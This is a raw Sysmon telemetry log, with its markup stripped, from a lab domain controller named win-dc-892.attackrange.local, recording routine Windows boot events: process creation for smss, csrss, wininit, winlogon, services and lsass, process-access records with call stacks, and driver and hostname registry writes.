10341000x80000000000000001048Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.971{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24cea|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001047Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:42.971{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001046Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.534{266CAFBE-646A-6064-0B00-00000000AE01}856860C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+4f6cc|C:\Windows\system32\lsasrv.dll+5817f|C:\Windows\system32\lsasrv.dll+636ee|C:\Windows\system32\lsass.exe+2086|C:\Windows\system32\lsass.exe+1e11|C:\Windows\system32\lsass.exe+1551|C:\Windows\system32\lsass.exe+4708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001045Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:42.362{266CAFBE-646A-6064-0700-00000000AE01}696700C:\Windows\system32\wininit.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1000000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wininit.exe+b9e0|C:\Windows\system32\wininit.exe+94ff|C:\Windows\system32\wininit.exe+8c5f|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001044Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.362{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001043Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.362{266CAFBE-646A-6064-0700-00000000AE01}696700C:\Windows\system32\wininit.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\wininit.exe+94d2|C:\Windows\system32\wininit.exe+8c5f|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001042Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.364{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exe10.0.14393.2580 (rs1_release_inmarket.181009-1745)Local Security Authority ProcessMicrosoft® Windows® Operating SystemMicrosoft 
Corporationlsass.exeC:\Windows\system32\lsass.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=5AE8589CDDE46ED132AEF8280BC8894A,SHA256=D957A03C6EA35CBF0C90B0B088DF07E7803A1A3EEB4BA889038F88DB066BBDC4,IMPHASH=0AA67FE637515AC7535797573607EAA2{266CAFBE-646A-6064-0700-00000000AE01}696C:\Windows\System32\wininit.exewininit.exe 10341000x80000000000000001041Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.252{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001040Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.252{266CAFBE-646A-6064-0700-00000000AE01}696700C:\Windows\system32\wininit.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\wininit.exe+94d2|C:\Windows\system32\wininit.exe+5977|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001039Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.241{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exe10.0.14393.4169 (rs1_release.210107-1130)Services and Controller appMicrosoft® Windows® Operating SystemMicrosoft Corporationservices.exeC:\Windows\system32\services.exeC:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=FEFC26105685C70D7260170489B5B520,SHA256=930F44F9A599937BDB23CF0C7EA4D158991B837D2A0975C15686CDD4198808E8,IMPHASH=A1C9FD59764D67AA201947276212F7CF{266CAFBE-646A-6064-0700-00000000AE01}696C:\Windows\System32\wininit.exewininit.exe 10341000x80000000000000001038Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.096{266CAFBE-6469-6064-0600-00000000AE01}688692C:\Windows\System32\smss.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\SYSTEM32\ntdll.dll+8c58e|C:\Windows\SYSTEM32\ntdll.dll+8c339|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+1d5e|\SystemRoot\System32\smss.exe+1b09|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5182f 154100x80000000000000001037Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.090{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\System32\winlogon.exe10.0.14393.3204 (rs1_release.190830-1500)Windows Logon ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWINLOGON.EXEwinlogon.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e71SystemMD5=DEA4CE12F24601830083126E18A2C7C9,SHA256=F002F8C2EA49D21F242996E3D57F5FDD7995FE6DB524BB69BBD7F190CC0211A9,IMPHASH=3CF10D94C117DB4F6E9D523B93429D6D{266CAFBE-6469-6064-0600-00000000AE01}688C:\Windows\System32\smss.exe- 10341000x80000000000000001036Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:42.065{266CAFBE-6467-6064-0200-00000000AE01}432440C:\Windows\System32\smss.exe{266CAFBE-646A-6064-0800-00000000AE01}704C:\Windows\system32\csrss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6c14|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5182f 13241300x80000000000000001035Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:42.002{266CAFBE-646A-6064-0700-00000000AE01}696C:\Windows\system32\wininit.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Domainattackrange.local 13241300x80000000000000001034Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:42.002{266CAFBE-646A-6064-0700-00000000AE01}696C:\Windows\system32\wininit.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Hostnamewin-dc-892 10341000x80000000000000001033Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.002{266CAFBE-6469-6064-0400-00000000AE01}616620C:\Windows\System32\smss.exe{266CAFBE-646A-6064-0700-00000000AE01}696C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\SYSTEM32\ntdll.dll+8c58e|C:\Windows\SYSTEM32\ntdll.dll+8c339|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+1d5e|\SystemRoot\System32\smss.exe+1b09|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5182f 154100x80000000000000001032Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.000{266CAFBE-646A-6064-0700-00000000AE01}696C:\Windows\System32\wininit.exe10.0.14393.2273 (rs1_release_1.180427-1811)Windows Start-Up ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWinInit.exewininit.exeC:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=5A998F811D7805B79B8E769027F62FD2,SHA256=8694C5732D26921EEA29589A9FA4182139EF3D9EA6B6D0ACCA8994B4AA5DEFE5,IMPHASH=C8D526C4E61942E1B11AE4B7EE2DDE5D{266CAFBE-6469-6064-0400-00000000AE01}616C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000ac 0000007c 10341000x80000000000000001031Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.002{266CAFBE-6469-6064-0600-00000000AE01}688692C:\Windows\System32\smss.exe{266CAFBE-646A-6064-0800-00000000AE01}704C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\SYSTEM32\ntdll.dll+8c58e|C:\Windows\SYSTEM32\ntdll.dll+8c339|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+1ee4|\SystemRoot\System32\smss.exe+20a1|\SystemRoot\System32\smss.exe+1c92|\SystemRoot\System32\smss.exe+1af6|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5182f 154100x80000000000000001030Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.003{266CAFBE-646A-6064-0800-00000000AE01}704C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e71SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{266CAFBE-6469-6064-0600-00000000AE01}688C:\Windows\System32\smss.exe- 
10341000x80000000000000001029Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:41.987{266CAFBE-6467-6064-0200-00000000AE01}432440C:\Windows\System32\smss.exe{266CAFBE-6469-6064-0600-00000000AE01}688C:\Windows\System32\smss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6c14|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001028Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:41.987{266CAFBE-6467-6064-0200-00000000AE01}432440C:\Windows\System32\smss.exe{266CAFBE-6469-6064-0600-00000000AE01}688C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\SYSTEM32\ntdll.dll+8c58e|C:\Windows\SYSTEM32\ntdll.dll+8c339|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+36ee|\SystemRoot\System32\smss.exe+c18e|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\SYSTEM32\ntdll.dll+5182f 154100x80000000000000001027Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:41.997{266CAFBE-6469-6064-0600-00000000AE01}688C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000000e0 0000007c C:\Windows\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e71SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{266CAFBE-6467-6064-0200-00000000AE01}432C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 10341000x80000000000000001026Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:41.987{266CAFBE-6467-6064-0200-00000000AE01}432440C:\Windows\System32\smss.exe{266CAFBE-6469-6064-0500-00000000AE01}624C:\Windows\system32\csrss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6c14|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5182f 13241300x80000000000000001025Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:41.893{266CAFBE-6469-6064-0500-00000000AE01}624C:\Windows\system32\csrss.exeHKLM\System\CurrentControlSet\Services\BasicDisplay\VolatileSettings\{5b45201d-f2f2-4f3b-85bb-30ff1f953599}Binary Data 13241300x80000000000000001024Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:41.893{266CAFBE-6469-6064-0500-00000000AE01}624C:\Windows\system32\csrss.exeHKLM\System\CurrentControlSet\Services\BasicDisplay\Video\ServiceBasicDisplay 13241300x80000000000000001023Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:41.893{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\monitor\Enum\NextInstanceDWORD (0x00000001) 13241300x80000000000000001022Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:41.893{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\monitor\Enum\CountDWORD (0x00000001) 13241300x80000000000000001021Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:41.893{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\monitor\Enum\0DISPLAY\Default_Monitor\4&69f2b1a&0&UID0 10341000x80000000000000001020Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:41.846{266CAFBE-6469-6064-0400-00000000AE01}616620C:\Windows\System32\smss.exe{266CAFBE-6469-6064-0500-00000000AE01}624C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\SYSTEM32\ntdll.dll+8c58e|C:\Windows\SYSTEM32\ntdll.dll+8c339|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+1ee4|\SystemRoot\System32\smss.exe+20a1|\SystemRoot\System32\smss.exe+1c92|\SystemRoot\System32\smss.exe+1af6|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5182f 154100x80000000000000001019Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:41.851{266CAFBE-6469-6064-0500-00000000AE01}624C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{266CAFBE-6469-6064-0400-00000000AE01}616C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000ac 0000007c 10341000x80000000000000001018Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:41.706{266CAFBE-6467-6064-0200-00000000AE01}432440C:\Windows\System32\smss.exe{00000000-0000-0000-0000-000000000000}616C:\Windows\System32\smss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6c14|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5182f 
10341000x80000000000000001017Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:41.706{266CAFBE-6467-6064-0200-00000000AE01}432440C:\Windows\System32\smss.exe{00000000-0000-0000-0000-000000000000}616C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\SYSTEM32\ntdll.dll+8c58e|C:\Windows\SYSTEM32\ntdll.dll+8c339|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+36ee|\SystemRoot\System32\smss.exe+c18e|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\SYSTEM32\ntdll.dll+5182f 154100x80000000000000001016Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:41.715{266CAFBE-6469-6064-0400-00000000AE01}616C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000000ac 0000007c C:\Windows\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{266CAFBE-6467-6064-0200-00000000AE01}432C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 13241300x80000000000000001015Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.799{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\VolumesSafeForWrite (Leave)Binary Data 10341000x80000000000000001014Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:39.799{266CAFBE-6467-6064-0200-00000000AE01}432436C:\Windows\System32\smss.exe{266CAFBE-6467-6064-0300-00000000AE01}572C:\Windows\system32\autochk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\SYSTEM32\ntdll.dll+8c58e|C:\Windows\SYSTEM32\ntdll.dll+8c339|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+4f84|\SystemRoot\System32\smss.exe+20b6|\SystemRoot\System32\smss.exe+65b2|\SystemRoot\System32\smss.exe+a3bb|\SystemRoot\System32\smss.exe+1652|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5182f 154100x80000000000000001013Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:39.789{266CAFBE-6467-6064-0300-00000000AE01}572C:\Windows\System32\autochk.exe10.0.14393.4283 (rs1_release.210303-1802)Auto Check UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationAutoChk.Exe\??\C:\Windows\system32\autochk.exe /q /v *C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=A782E5C76170546278F1654332F3DA46,SHA256=CCA83B3DDE1DACFB121299E9468D52D57582E805F273234166F5EB001543AC31,IMPHASH=1BF5E4792E849FE3BCFE23E7C1B21A3F{266CAFBE-6467-6064-0200-00000000AE01}432C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 13241300x80000000000000001012Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.784{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\BiosDataBinary Data 13241300x80000000000000001011Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.784{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\RegistersDataBinary Data 13241300x80000000000000001010Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:00:39.784{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosDataBinary Data 13241300x80000000000000001009Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.784{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\AcpiDataBinary Data 13241300x80000000000000001008Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.784{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\BiosDataBinary Data 13241300x80000000000000001007Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.784{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\RegistersDataBinary Data 13241300x80000000000000001006Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.784{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosDataBinary Data 13241300x80000000000000001005Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.784{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\AcpiDataBinary Data 13241300x80000000000000001004Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.768{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\VolumesSafeForWrite (Enter)Binary Data 13241300x80000000000000001003Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.768{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\XEN\Unplug\NICSDWORD (0x00000001) 
13241300x80000000000000001002Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2021-03-31 12:00:39.752{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Enum\XENVIF\VEN_XS0001&DEV_NET&REV_0000000B\0\FriendlyNameAWS PV Network Device #0 13241300x80000000000000001001Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.752{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\xennet\DriverMinorVersionDWORD (0x00000002) 13241300x80000000000000001000Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.752{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\xennet\DriverMajorVersionDWORD (0x00000008) 13241300x8000000000000000999Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.752{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\xennet\NdisMinorVersionDWORD (0x00000001) 13241300x8000000000000000998Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.752{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\xennet\NdisMajorVersionDWORD (0x00000006) 13241300x8000000000000000997Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.752{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\xennet\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000996Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.752{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\xennet\Enum\CountDWORD (0x00000001) 13241300x8000000000000000995Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
